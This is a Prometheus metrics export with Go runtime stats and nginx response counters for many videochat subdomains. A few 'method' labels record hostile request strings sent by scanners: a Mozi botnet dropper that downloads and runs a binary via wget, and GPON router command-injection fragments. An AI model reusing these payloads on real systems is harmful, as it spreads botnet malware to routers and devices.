# HELP go_gc_duration_seconds A summary of the GC invocation durations. # TYPE go_gc_duration_seconds summary go_gc_duration_seconds{quantile="0"} 1.9918e-05 go_gc_duration_seconds{quantile="0.25"} 3.0092e-05 go_gc_duration_seconds{quantile="0.5"} 3.6882e-05 go_gc_duration_seconds{quantile="0.75"} 9.4641e-05 go_gc_duration_seconds{quantile="1"} 0.025238381 go_gc_duration_seconds_sum 723.119843673 go_gc_duration_seconds_count 1.811624e+06 # HELP go_goroutines Number of goroutines that currently exist. # TYPE go_goroutines gauge go_goroutines 50 # HELP go_memstats_alloc_bytes Number of bytes allocated and still in use. # TYPE go_memstats_alloc_bytes gauge go_memstats_alloc_bytes 3.26256e+07 # HELP go_memstats_alloc_bytes_total Total number of bytes allocated, even if freed. # TYPE go_memstats_alloc_bytes_total counter go_memstats_alloc_bytes_total 3.3164939288216e+13 # HELP go_memstats_buck_hash_sys_bytes Number of bytes used by the profiling bucket hash table. # TYPE go_memstats_buck_hash_sys_bytes gauge go_memstats_buck_hash_sys_bytes 1.933612e+06 # HELP go_memstats_frees_total Total number of frees. # TYPE go_memstats_frees_total counter go_memstats_frees_total 1.355666375581e+12 # HELP go_memstats_gc_sys_bytes Number of bytes used for garbage collection system metadata. # TYPE go_memstats_gc_sys_bytes gauge go_memstats_gc_sys_bytes 5.640192e+06 # HELP go_memstats_heap_alloc_bytes Number of heap bytes allocated and still in use. # TYPE go_memstats_heap_alloc_bytes gauge go_memstats_heap_alloc_bytes 3.26256e+07 # HELP go_memstats_heap_idle_bytes Number of heap bytes waiting to be used. # TYPE go_memstats_heap_idle_bytes gauge go_memstats_heap_idle_bytes 8.8317952e+07 # HELP go_memstats_heap_inuse_bytes Number of heap bytes that are in use. # TYPE go_memstats_heap_inuse_bytes gauge go_memstats_heap_inuse_bytes 4.4785664e+07 # HELP go_memstats_heap_objects Number of allocated objects. # TYPE go_memstats_heap_objects gauge go_memstats_heap_objects 678923 # HELP go_memstats_heap_released_bytes_total Total number of heap bytes released to OS. # TYPE go_memstats_heap_released_bytes_total counter go_memstats_heap_released_bytes_total 7.3596928e+07 # HELP go_memstats_heap_sys_bytes Number of heap bytes obtained from system. # TYPE go_memstats_heap_sys_bytes gauge go_memstats_heap_sys_bytes 1.33103616e+08 # HELP go_memstats_last_gc_time_seconds Number of seconds since 1970 of last garbage collection. # TYPE go_memstats_last_gc_time_seconds gauge go_memstats_last_gc_time_seconds 1.7696288058834383e+09 # HELP go_memstats_lookups_total Total number of pointer lookups. # TYPE go_memstats_lookups_total counter go_memstats_lookups_total 0 # HELP go_memstats_mallocs_total Total number of mallocs. # TYPE go_memstats_mallocs_total counter go_memstats_mallocs_total 1.355667054504e+12 # HELP go_memstats_mcache_inuse_bytes Number of bytes in use by mcache structures. # TYPE go_memstats_mcache_inuse_bytes gauge go_memstats_mcache_inuse_bytes 6944 # HELP go_memstats_mcache_sys_bytes Number of bytes used for mcache structures obtained from system. # TYPE go_memstats_mcache_sys_bytes gauge go_memstats_mcache_sys_bytes 16384 # HELP go_memstats_mspan_inuse_bytes Number of bytes in use by mspan structures. # TYPE go_memstats_mspan_inuse_bytes gauge go_memstats_mspan_inuse_bytes 771936 # HELP go_memstats_mspan_sys_bytes Number of bytes used for mspan structures obtained from system. # TYPE go_memstats_mspan_sys_bytes gauge go_memstats_mspan_sys_bytes 1.048576e+06 # HELP go_memstats_next_gc_bytes Number of heap bytes when next garbage collection will take place. # TYPE go_memstats_next_gc_bytes gauge go_memstats_next_gc_bytes 5.67496e+07 # HELP go_memstats_other_sys_bytes Number of bytes used for other system allocations. # TYPE go_memstats_other_sys_bytes gauge go_memstats_other_sys_bytes 997324 # HELP go_memstats_stack_inuse_bytes Number of bytes in use by the stack allocator. # TYPE go_memstats_stack_inuse_bytes gauge go_memstats_stack_inuse_bytes 1.114112e+06 # HELP go_memstats_stack_sys_bytes Number of bytes obtained from system for stack allocator. # TYPE go_memstats_stack_sys_bytes gauge go_memstats_stack_sys_bytes 1.114112e+06 # HELP go_memstats_sys_bytes Number of bytes obtained by system. Sum of all system allocations. # TYPE go_memstats_sys_bytes gauge go_memstats_sys_bytes 1.43853816e+08 # HELP http_request_duration_microseconds The HTTP request latencies in microseconds. # TYPE http_request_duration_microseconds summary http_request_duration_microseconds{handler="prometheus",quantile="0.5"} 679668.344 http_request_duration_microseconds{handler="prometheus",quantile="0.9"} 778120.118 http_request_duration_microseconds{handler="prometheus",quantile="0.99"} 1.871659834e+06 http_request_duration_microseconds_sum{handler="prometheus"} 1.1184928844007773e+12 http_request_duration_microseconds_count{handler="prometheus"} 2.543389e+06 # HELP http_request_size_bytes The HTTP request sizes in bytes. # TYPE http_request_size_bytes summary http_request_size_bytes{handler="prometheus",quantile="0.5"} 216 http_request_size_bytes{handler="prometheus",quantile="0.9"} 216 http_request_size_bytes{handler="prometheus",quantile="0.99"} 216 http_request_size_bytes_sum{handler="prometheus"} 5.49361763e+08 http_request_size_bytes_count{handler="prometheus"} 2.543389e+06 # HELP http_requests_total Total number of HTTP requests made. # TYPE http_requests_total counter http_requests_total{code="200",handler="prometheus",method="get"} 2.543389e+06 # HELP http_response_size_bytes The HTTP response sizes in bytes. # TYPE http_response_size_bytes summary http_response_size_bytes{handler="prometheus",quantile="0.5"} 503078 http_response_size_bytes{handler="prometheus",quantile="0.9"} 503091 http_response_size_bytes{handler="prometheus",quantile="0.99"} 503096 http_response_size_bytes_sum{handler="prometheus"} 6.97649638299e+11 http_response_size_bytes_count{handler="prometheus"} 2.543389e+06 # HELP nginx_http_response_count_total Amount of processed HTTP requests # TYPE nginx_http_response_count_total counter nginx_http_response_count_total{app="web",host="161.97.120.25",method="",status="400",vhost="-"} 229 nginx_http_response_count_total{app="web",host="161.97.120.25",method="",status="408",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="&language=0",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="*1",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="+/tmp/gpon80&ipv=0",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="/tmp/gpon80&ipv=0",status="400",vhost="-"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="0;sh+/tmp/gpon80&ipv=0",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="1111\\x0C\\x01\\x00\\x00\\x04\\x00\\x00\\x01\\x1B\\x09\\x00\\x00\\x02\\x01\\x00\\x00\\xFC\\x00\\x00\\x00admin\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00queryBasicCfg\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win",status="400",vhost="-"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="238\\x00ll|'|'|SGFjS2VkX0Q3NUU2QUFB|'|'|WIN-QZN7FJ7D1O|'|'|Administrator|'|'|18-11-28|'|'||'|'|Win",status="400",vhost="-"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$",status="400",vhost="-"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method=";sh+/tmp/gpon80&ipv=0",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="=0",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="AMQP\\x00\\x00\\x09\\x01",status="400",vhost="-"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="A\\x00\\x00\\x00\\x03fH\\xBBd~\\x8E\\xFC\\x94g\\xD2\\xDB\\xFC\\xEE\\x8D\\xFF\\x98",status="400",vhost="-"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="CONNECT",status="400",vhost="-"} 721 nginx_http_response_count_total{app="web",host="161.97.120.25",method="DELETE",status="405",vhost="161.97.120.25:80"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="F",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="161.97.120.25"} 854 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="161.97.120.25:80"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="_mta-sts.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="admin.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.cafe"} 18209 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.date"} 8251 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.mx"} 28474 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.show"} 14976 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.tv.br"} 41704 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.world"} 42799 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.cafe"} 30049 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.date"} 9604 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.mx"} 20281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.show"} 15409 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.tv.br"} 53161 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.world"} 41914 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.cafe"} 17766 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.date"} 5540 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.mx"} 17595 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.show"} 25421 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.tv.br"} 32394 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.world"} 30345 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ampwdba.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="api.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="app.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.cafe"} 16847 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.date"} 8077 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.mx"} 54615 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.show"} 20699 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.tv.br"} 85146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.world"} 48361 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.cafe"} 13625 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.date"} 5509 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.mx"} 15689 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.show"} 17020 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.tv.br"} 28874 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.world"} 41551 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.cafe"} 36318 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.date"} 4655 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.mx"} 26988 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.show"} 20508 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.tv.br"} 49883 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.world"} 51078 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="backend.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.cafe"} 55716 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.date"} 5708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.mx"} 24276 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.show"} 15613 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.tv.br"} 33954 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.world"} 34897 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.cafe"} 35936 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.date"} 9855 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.mx"} 25680 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.show"} 23684 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.tv.br"} 54029 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.world"} 67227 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.cafe"} 20071 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.date"} 6158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.mx"} 18352 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.show"} 13477 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.tv.br"} 41589 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.world"} 50868 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.cafe"} 15236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.date"} 5639 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.mx"} 29250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.show"} 23112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.tv.br"} 31476 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.world"} 48710 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.cafe"} 21375 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.date"} 7426 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.mx"} 21047 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.show"} 17844 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.tv.br"} 37211 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.world"} 45741 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.cafe"} 33194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.date"} 8445 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.mx"} 30379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.show"} 19638 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.tv.br"} 43236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.world"} 52931 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.cafe"} 43696 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.date"} 8258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.mx"} 12729 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.show"} 20656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.tv.br"} 57970 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.world"} 56838 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.cafe"} 24497 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.date"} 9122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.mx"} 18981 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.show"} 16876 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.tv.br"} 39055 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.world"} 43911 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.cafe"} 28635 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.date"} 8515 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.mx"} 23206 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.show"} 12849 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.tv.br"} 59979 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.world"} 60280 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.cafe"} 22231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.date"} 10282 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.mx"} 26871 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.show"} 11854 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.tv.br"} 37161 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.world"} 42836 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.cafe"} 37400 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.date"} 9508 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.mx"} 29787 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.show"} 23634 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.tv.br"} 34198 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.world"} 43510 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="demo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="dev.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.cafe"} 20417 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.date"} 8443 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.mx"} 24560 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.show"} 14595 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.tv.br"} 28465 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.world"} 37833 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eeiodfa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.cafe"} 15518 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.date"} 3961 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.mx"} 17851 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.show"} 9877 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.tv.br"} 28101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.world"} 32865 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="en.videochat.cafe"} 27278 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="en.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="en.videochat.mx"} 28196 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="en.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="en.videochat.tv.br"} 36939 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.cafe"} 36546 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.date"} 8633 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.mx"} 32792 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.show"} 23533 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.tv.br"} 49564 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.world"} 49064 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="es.videochat.cafe"} 26095 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="es.videochat.date"} 7142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="es.videochat.show"} 21984 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="es.videochat.tv.br"} 121649 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="es.videochat.world"} 54504 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.cafe"} 24871 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.date"} 4143 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.mx"} 20995 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.show"} 19483 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.tv.br"} 58449 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.world"} 62141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.cafe"} 30909 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.date"} 6272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.mx"} 27827 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.show"} 22927 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.tv.br"} 46420 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.world"} 51059 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.cafe"} 11586 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.date"} 5076 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.mx"} 28893 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.show"} 23068 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.tv.br"} 68564 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.world"} 63460 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.cafe"} 17257 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.date"} 7430 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.mx"} 19587 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.show"} 19535 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.tv.br"} 36866 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.world"} 42745 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.date"} 7666 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.mx"} 28583 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.show"} 16987 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.tv.br"} 46953 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.world"} 67719 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.cafe"} 28300 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.date"} 7232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.mx"} 24542 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.show"} 18272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.tv.br"} 44270 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.world"} 58640 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.cafe"} 31358 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.date"} 7531 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.mx"} 42357 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.show"} 13604 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.tv.br"} 49761 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.world"} 55678 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.cafe"} 33191 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.date"} 8892 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.mx"} 26642 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.show"} 11203 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.tv.br"} 35247 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.world"} 39168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.cafe"} 31292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.date"} 5741 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.mx"} 24221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.show"} 30062 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.tv.br"} 66224 